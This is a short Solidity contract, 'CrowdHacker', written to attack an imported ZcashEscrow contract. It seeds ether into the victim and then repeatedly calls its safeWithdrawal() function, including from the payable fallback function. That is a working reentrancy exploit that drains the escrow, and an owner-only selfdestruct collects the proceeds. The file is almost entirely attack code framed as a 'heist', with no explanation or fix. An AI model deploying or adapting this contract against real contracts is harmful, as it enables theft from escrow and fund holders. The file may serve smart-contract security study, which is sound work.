pragma solidity ^0.4.1;

import "./ZcashEscrow.solc";

contract CrowdHacker {

  ZcashEscrow public victim;
  address public owner;
    
  function CrowdHacker() {
    owner = msg.sender;
  }

  function initiateHack(address _victim) {
    victim = ZcashEscrow(_victim);
  }

  // Pay into the CrowdHacker to seed the heist
  function seedThePot() payable {
  }

  function payIntoVictim() {
    if (!address(victim).send(this.balance)) {
      throw;
    } // pass the money along, or throw a tantrum if we can't
  }

  function startTheHeist() {
    victim.safeWithdrawal();
  }

  function() payable {
    victim.safeWithdrawal();
  }

  function kill() {
    if (msg.sender == owner) {
      selfdestruct(owner);
    }
  }

}
